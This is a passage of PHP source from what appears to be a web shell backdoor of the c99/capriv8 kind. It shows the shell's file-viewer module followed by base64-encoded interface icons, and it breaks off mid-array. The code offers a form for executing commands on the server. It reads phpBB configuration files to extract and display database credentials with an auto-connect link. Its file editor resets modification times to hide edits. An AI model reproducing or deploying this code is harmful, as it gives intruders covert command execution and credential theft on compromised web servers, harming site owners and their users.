  2249.       else {echo " <a href=\"".$surl."x=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
  2250.       echo " (<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
  2251.     }
  2252.     echo "<hr size=\"1\" noshade>";
  2253.     if ($ft == "info") {
  2254.       echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
  2255.       if (!$win) {
  2256.         echo "<tr><td><b>Owner/Group</b></td><td> ";
  2257.         $ow = posix_getpwuid(fileowner($d.$f));
  2258.         $gr = posix_getgrgid(filegroup($d.$f));
  2259.         echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
  2260.       }
  2261.       echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."x=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
  2262.       $fi = fopen($d.$f,"rb");
  2263.       if ($fi) {
  2264.         if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
  2265.         else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
  2266.         $n = 0;
  2267.         $a0 = "00000000<br>";
  2268.         $a1 = "";
  2269.         $a2 = "";
  2270.         for ($i=0; $i<strlen($str); $i++) {
  2271.           $a1 .= sprintf("%02X",ord($str[$i]))." ";
  2272.           switch (ord($str[$i])) {
  2273.             case 0:  $a2 .= "<font>0</font>"; break;
  2274.             case 32:
  2275.             case 10:
  2276.             case 13: $a2 .= "&nbsp;"; break;
  2277.             default: $a2 .= htmlspecialchars($str[$i]);
  2278.           }
  2279.           $n++;
  2280.           if ($n == $hexdump_rows) {
  2281.             $n = 0;
  2282.             if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
  2283.             $a1 .= "<br>";
  2284.             $a2 .= "<br>";
  2285.           }
  2286.         }
  2287.         echo "<table border=1 bgcolor=#666666>".
  2288.              "<tr><td bgcolor=#666666>".$a0."</td>".
  2289.              "<td bgcolor=#000000>".$a1."</td>".
  2290.              "<td bgcolor=#000000>".$a2."</td>".
  2291.              "</tr></table><br>";
  2292.       }
  2293.       $encoded = "";
  2294.       if ($base64 == 1) {
  2295.         echo "<b>Base64 Encode</b><br>";
  2296.         $encoded = base64_encode(file_get_contents($d.$f));
  2297.       }
  2298.       elseif($base64 == 2) {
  2299.         echo "<b>Base64 Encode + Chunk</b><br>";
  2300.         $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
  2301.       }
  2302.       elseif($base64 == 3) {
  2303.         echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
  2304.         $encoded = base64_encode(file_get_contents($d.$f));
  2305.         $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
  2306.       }
  2307.       elseif($base64 == 4) {
  2308.         $text = file_get_contents($d.$f);
  2309.         $encoded = base64_decode($text);
  2310.         echo "<b>Base64 Decode";
  2311.     if (base64_encode($encoded) != $text) {echo " (failed)";}
  2312.     echo "</b><br>";
  2313.    }
  2314.    if (!empty($encoded))
  2315.    {
  2316.     echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
  2317.    }
  2318.    echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
  2319.        <nobr>[<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
  2320.        <nobr>[<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
  2321.        <nobr>[<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
  2322.        <nobr>[<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
  2323.        <P>";
  2324.   }
  2325.   elseif ($ft == "html") {
  2326.    if ($white) {@ob_clean();}
  2327.    echo $r;
  2328.    if ($white) {capriv8exit();}
  2329.   }
  2330.   elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
  2331.   elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
  2332.   elseif ($ft == "phpsess") {
  2333.    echo "<pre>";
  2334.    $v = explode("|",$r);
  2335.    echo $v[0]."<br>";
  2336.    var_dump(unserialize($v[1]));
  2337.    echo "</pre>";
  2338.   }
  2339.   elseif ($ft == "exe") {
  2340.    $ext = explode(".",$f);
  2341.    $c = count($ext)-1;
  2342.    $ext = $ext[$c];
  2343.    $ext = strtolower($ext);
  2344.    $rft = "";
  2345.    foreach($exeftypes as $k=>$v)
  2346.    {
  2347.     if (in_array($ext,$v)) {$rft = $k; break;}
  2348.    }
  2349.    $cmd = str_replace("%f%",$f,$rft);
  2350.    echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=x value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
  2351.   }
  2352.   elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
  2353.   elseif ($ft == "code") {
  2354.     if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) {
  2355.       $arr = explode("\n",$r);
  2356.       if (count($arr == 18)) {
  2357.         include($d.$f);
  2358.         echo "<b>phpBB configuration is detected in this file!<br>";
  2359.         if ($dbms == "mysql4") {$dbms = "mysql";}
  2360.         if ($dbms == "mysql") {echo "<a href=\"".$surl."x=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
  2361.         else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ".$sh_name.". Please, report us for fix.";}
  2362.         echo "Parameters for manual connect:<br>";
  2363.         $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
  2364.         foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
  2365.         echo "</b><hr size=\"1\" noshade>";
  2366.       }
  2367.     }
  2368.     echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
  2369.     if (!empty($white)) {@ob_clean();}
  2370.     highlight_file($d.$f);
  2371.     if (!empty($white)) {capriv8exit();}
  2372.     echo "</div>";
  2373.   }
  2374.   elseif ($ft == "download") {
  2375.     @ob_clean();
  2376.     header("Content-type: application/octet-stream");
  2377.     header("Content-length: ".filesize($d.$f));
  2378.     header("Content-disposition: attachment; filename=\"".$f."\";");
  2379.     echo $r;
  2380.     exit;
  2381.   }
  2382.   elseif ($ft == "notepad") {
  2383.     @ob_clean();
  2384.     header("Content-type: text/plain");
  2385.     header("Content-disposition: attachment; filename=\"".$f.".txt\";");
  2386.     echo($r);
  2387.     exit;
  2388.   }
  2389.   elseif ($ft == "img") {
  2390.     $inf = getimagesize($d.$f);
  2391.     if (!$white) {
  2392.       if (empty($imgsize)) {$imgsize = 20;}
  2393.       $width = $inf[0]/100*$imgsize;
  2394.       $height = $inf[1]/100*$imgsize;
  2395.       echo "<center><b>Size:</b>&nbsp;";
  2396.       $sizes = array("100","50","20");
  2397.       foreach ($sizes as $v) {
  2398.         echo "<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
  2399.         if ($imgsize != $v ) {echo $v;}
  2400.         else {echo "<u>".$v."</u>";}
  2401.         echo "</a>&nbsp;&nbsp;&nbsp;";
  2402.       }
  2403.       echo "<br><br><img src=\"".$surl."x=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
  2404.     }
  2405.     else {
  2406.       @ob_clean();
  2407.       $ext = explode($f,".");
  2408.       $ext = $ext[count($ext)-1];
  2409.       header("Content-type: ".$inf["mime"]);
  2410.       readfile($d.$f);
  2411.       exit;
  2412.     }
  2413.   }
  2414.   elseif ($ft == "edit") {
  2415.    if (!empty($submit))
  2416.    {
  2417.     if ($filestealth) {$stat = stat($d.$f);}
  2418.     $fp = fopen($d.$f,"w");
  2419.     if (!$fp) {echo "<b>Can't write to file!</b>";}
  2420.     else
  2421.     {
  2422.      echo "<b>Saved!</b>";
  2423.      fwrite($fp,$edit_text);
  2424.      fclose($fp);
  2425.      if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
  2426.      $r = $edit_text;
  2427.     }
  2428.    }
  2429.    $rows = count(explode("\r\n",$r));
  2430.    if ($rows < 10) {$rows = 10;}
  2431.    if ($rows > 30) {$rows = 30;}
  2432.    echo "<form action=\"".$surl."x=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."x=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
  2433.   }
  2434.   elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
  2435.   else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
  2436. }
  2437. echo "</div>\n";
  2438. }
  2439. }
  2440. else {
  2441. @ob_clean();
  2442. $images = array(
  2443. "arrow_ltr"=>
  2444. "R0lGODlhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQSIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
  2445. "back"=>
  2446. "R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  2447. "aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
  2448. "Wg0JADs=",
  2449. "buffer"=>
  2450. "R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
  2451. "eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
  2452. "Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
  2453. "change"=>
  2454. "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
  2455. "/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
  2456. "AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
  2457. "wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
  2458. "CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
  2459. "zMshADs=",
  2460. "delete"=>
  2461. "R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
  2462. "6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
  2463. "sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
  2464. "vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
  2465. "ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
  2466. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2467. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
  2468. "BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
  2469. "STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
  2470. "BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
  2471. "jwVFHBgiEGQFIgQasYkcSbJQIAA7",
  2472. "download"=>
  2473. "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
  2474. "AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
  2475. "EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
  2476. "forward"=>
  2477. "R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  2478. "aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
  2479. "WqsJADs=",
  2480. "home"=>
  2481. "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
  2482. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
  2483. "krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
  2484. "VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
  2485. "mode"=>
  2486. "R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
  2487. "AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
  2488. "2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
  2489. "dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
  2490. "search"=>
  2491. "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
  2492. "/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
  2493. "s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
  2494. "AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
  2495. "Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
  2496. "setup"=>
  2497. "R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
  2498. "QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
  2499. "ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
  2500. "qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
  2501. "OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
  2502. "small_dir"=>
  2503. "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
  2504. "AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
  2505. "/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
  2506. "small_unk"=>
  2507. "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
  2508. "p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
  2509. "/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
  2510. "/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
  2511. "/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
  2512. "wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
  2513. "9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
  2514. "66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
  2515. "24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2516. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2517. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2518. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2519. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2520. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2521. "AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
  2522. "aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
  2523. "uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
  2524. "yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
  2525. "yAsokBkQADs=",
  2526. "multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
  2527. "pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
  2528. "sort_asc"=>
  2529. "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
  2530. "SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
  2531. "sort_desc"=>
  2532. "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
  2533. "SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
  2534. "sql_button_drop"=>
  2535. "R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  2536. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2537. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  2538. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  2539. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  2540. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  2541. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  2542. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  2543. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  2544. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  2545. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  2546. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
  2547. "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
  2548. "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
  2549. "AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
  2550. "AQEAOw==",
  2551. "sql_button_empty"=>
  2552. "R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  2553. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2554. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  2555. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  2556. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  2557. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  2558. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  2559. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  2560. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  2561. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  2562. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  2563. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
  2564. "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
  2565. "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
  2566. "AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
  2567. "sql_button_insert"=>
  2568. "R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  2569. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2570. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  2571. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  2572. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  2573. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  2574. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  2575. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  2576. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  2577. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  2578. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  2579. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
  2580. "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
  2581. "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
  2582. "AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
  2583. "up"=>
  2584. "R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
